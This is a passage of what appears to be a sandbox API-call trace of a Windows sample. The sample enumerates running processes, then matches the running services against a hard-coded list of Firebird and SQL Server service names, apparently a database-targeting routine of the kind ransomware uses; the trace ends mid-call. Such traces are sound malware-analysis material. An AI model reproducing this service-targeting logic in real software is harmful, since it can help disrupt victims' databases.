[0193.362] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0193.363] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0193.363] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.364] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0193.364] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0193.365] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0193.365] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0193.365] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0193.366] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0193.366] lstrlenW (lpString="conhost.exe") returned 11 [0193.366] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0193.367] lstrlenW (lpString="roof competitive.exe") returned 20 [0193.367] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0193.368] lstrlenW (lpString="trustees.exe") returned 12 [0193.369] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0193.369] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0193.369] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0193.370] lstrlenW (lpString="isbn.exe") returned 8 [0193.370] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0193.371] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0193.371] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0193.372] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0193.372] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0193.373] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0193.373] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0193.374] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0193.374] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0193.375] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0193.375] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0193.641] lstrlenW (lpString="playstation iraq.exe") returned 20 [0193.641] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0193.642] lstrlenW (lpString="harbor.exe") returned 10 [0193.642] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0193.643] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0193.643] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0193.644] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0193.644] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0193.645] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0193.645] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0193.646] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0193.646] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0193.647] lstrlenW (lpString="larent.exe") returned 10 [0193.647] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0193.648] lstrlenW (lpString="stereo.exe") returned 10 [0193.648] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0193.649] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0193.649] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0193.650] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0193.650] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0193.651] lstrlenW (lpString="state.exe") returned 9 [0193.651] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0193.652] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0193.652] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0193.653] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0193.653] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0193.654] lstrlenW (lpString="taskhostw.exe") returned 13 [0193.654] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0193.655] lstrlenW (lpString="sppsvc.exe") returned 10 [0193.655] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.656] lstrlenW (lpString="svchost.exe") returned 11 [0193.656] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0193.657] lstrlenW (lpString="Pg.exe") returned 6 [0193.657] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0193.658] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0193.658] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0193.659] lstrlenW (lpString="conhost.exe") returned 11 [0193.659] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0193.660] lstrlenW (lpString="cmd.exe") returned 7 [0193.660] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0193.660] lstrlenW (lpString="conhost.exe") returned 11 [0193.661] Process32NextW (in: hSnapshot=0x37c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0193.661] CloseHandle (hObject=0x37c) returned 1 [0193.661] Sleep (dwMilliseconds=0x1f4) [0195.056] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bcb0 [0195.057] EnumServicesStatusExW (in: hSCManager=0x236bcb0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0195.057] GetLastError () returned 0xea [0195.057] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x236f6b8 [0195.057] EnumServicesStatusExW (in: hSCManager=0x236bcb0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x236f6b8, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x236f6b8, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0195.058] CloseServiceHandle (hSCObject=0x236bcb0) returned 1 [0195.058] lstrlenW (lpString="Appinfo") returned 7 [0195.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0195.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0195.059] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0195.059] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0195.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0195.059] lstrlenW (lpString="AppXSvc") returned 7 [0195.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0195.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0195.059] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0195.059] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0195.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0195.059] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0195.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0195.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0195.059] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0195.059] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0195.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0195.059] lstrlenW (lpString="Audiosrv") returned 8 [0195.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0195.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0195.059] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0195.059] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0195.059] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0195.059] lstrlenW (lpString="BFE") returned 3 [0195.059] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0195.059] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0195.059] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0195.060] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0195.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0195.060] lstrlenW (lpString="BITS") returned 4 [0195.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0195.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0195.060] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0195.060] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0195.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0195.060] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0195.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0195.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0195.060] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0195.060] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0195.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0195.060] lstrlenW (lpString="CDPSvc") returned 6 [0195.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0195.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0195.060] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0195.060] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0195.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0195.060] lstrlenW (lpString="ClickToRunSvc") returned 13 [0195.060] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0195.060] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0195.060] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0195.060] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0195.060] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0195.060] lstrlenW (lpString="ClipSVC") returned 7 [0195.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0195.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0195.061] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0195.061] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0195.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0195.061] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0195.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0195.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0195.061] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0195.061] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0195.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0195.061] lstrlenW (lpString="CryptSvc") returned 8 [0195.061] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0195.061] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0195.061] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0195.061] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0195.061] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0195.061] lstrlenW (lpString="DcomLaunch") returned 10 [0195.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0195.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0195.062] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0195.062] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0195.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0195.062] lstrlenW (lpString="DeviceAssociationService") returned 24 [0195.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0195.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0195.062] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0195.062] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0195.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0195.062] lstrlenW (lpString="Dhcp") returned 4 [0195.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0195.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0195.062] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0195.062] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0195.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0195.062] lstrlenW (lpString="Dnscache") returned 8 [0195.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0195.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0195.062] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0195.062] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0195.062] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0195.062] lstrlenW (lpString="DoSvc") returned 5 [0195.062] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0195.062] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0195.063] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0195.063] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0195.063] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0195.063] lstrlenW (lpString="DPS") returned 3 [0195.063] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0195.063] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0195.063] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0195.063] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0195.063] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0195.063] lstrlenW (lpString="DusmSvc") returned 7 [0195.063] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0195.063] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0195.169] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0195.169] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0195.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0195.169] lstrlenW (lpString="EventLog") returned 8 [0195.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0195.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0195.169] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0195.169] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0195.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0195.169] lstrlenW (lpString="EventSystem") returned 11 [0195.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0195.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0195.169] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0195.169] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0195.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0195.169] lstrlenW (lpString="FontCache") returned 9 [0195.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0195.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0195.169] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0195.169] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0195.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0195.169] lstrlenW (lpString="gpsvc") returned 5 [0195.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0195.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0195.169] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0195.169] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0195.169] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0195.169] lstrlenW (lpString="iphlpsvc") returned 8 [0195.169] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0195.169] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0195.169] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0195.170] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0195.170] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0195.170] lstrlenW (lpString="KeyIso") returned 6 [0195.170] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0195.170] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0195.170] lstrcmpiW (lpString1="sqlwriter", 